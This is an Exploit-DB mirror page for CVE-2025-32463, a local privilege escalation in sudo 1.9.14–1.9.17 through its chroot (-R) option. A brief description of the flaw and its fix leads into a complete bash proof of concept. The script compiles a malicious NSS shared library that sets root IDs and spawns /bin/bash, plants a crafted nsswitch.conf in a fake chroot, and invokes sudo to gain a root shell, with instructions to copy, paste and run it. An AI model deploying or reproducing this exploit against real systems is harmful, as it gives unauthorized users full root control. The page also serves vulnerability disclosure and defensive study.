bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/52352.txt
Exploit-DB 1c08d6e575 DB: 2025-07-09 
9 changes to exploits/shellcodes/ghdb

Sudo 1.9.17 Host Option - Elevation of Privilege
Sudo chroot 1.9.17 - Local Privilege Escalation

Microsoft Defender for Endpoint (MDE) - Elevation of Privilege

ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)

Discourse 3.2.x - Anonymous Cache Poisoning

Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover

Microsoft Outlook - Remote Code Execution (RCE)

Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
2025-07-09 00:16:23 +00:00

98 lines
No EOL
3.1 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation
Google Dork: not aplicable
Date: Mon, 30 Jun 2025
Exploit Author: Stratascale
Vendor Homepage:https://salsa.debian.org/sudo-team/sudo
Software Link:
Version: Sudo versions 1.9.14 to 1.9.17 inclusive
Tested on: Kali Rolling 2025-7-3
CVE : CVE-2025-32463
*Version running today in Kali:*
https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/
*Background*
An attacker can leverage sudo's -R (--chroot) option to run
arbitrary commands as root, even if they are not listed in the
sudoers file.
Sudo versions affected:
Sudo versions 1.9.14 to 1.9.17 inclusive are affected.
CVE ID:
This vulnerability has been assigned CVE-2025-32463 in the
Common Vulnerabilities and Exposures database.
Details:
Sudo's -R (--chroot) option is intended to allow the user to
run a command with a user-selected root directory if the sudoers
file allows it. A change was made in sudo 1.9.14 to resolve
paths via chroot() using the user-specified root directory while
the sudoers file was still being evaluated. It is possible for
an attacker to trick sudo into loading an arbitrary shared
library by creating an /etc/nsswitch.conf file under the
user-specified root directory.
The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
and the chroot feature has been marked as deprecated. It will
be removed entirely in a future sudo release. Because of the
way sudo resolves commands, supporting a user-specified chroot
directory is error-prone and this feature does not appear to
be widely used.
A more detailed description of the bug and its effects can be
found in the Stratascale advisory:
https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Impact:
On systems that support /etc/nsswitch.conf a user may be able
to run arbitrary commands as root.
*Exploit:*
*Verify the sudo version running: sudo --versionIf is vulnerable, copy and
paste the following code and run it.*
*----------------------*
#!/bin/bash
# sudo-chwoot.sh PoC CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
# 1. NSS library
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
setreuid(0,0); /* change to UID 0 */
setregid(0,0); /* change to GID 0 */
chdir("/"); /* exit from chroot */
execl("/bin/bash","/bin/bash",NULL); /* root shell */
}
EOF
# 2. Mini chroot with toxic nsswitch.conf
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc # make getgrnam() not fail
# 3. compile libnss_
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "[*] Running exploit…"
sudo -R woot woot # (-R <dir> <cmd>)
# • the first “woot” is chroot
# • the second “woot” is and inexistent
command
# (only needs resolve the user)
rm -rf "$STAGE"
*----------------------*
Reference in a new issue View git blame Copy permalink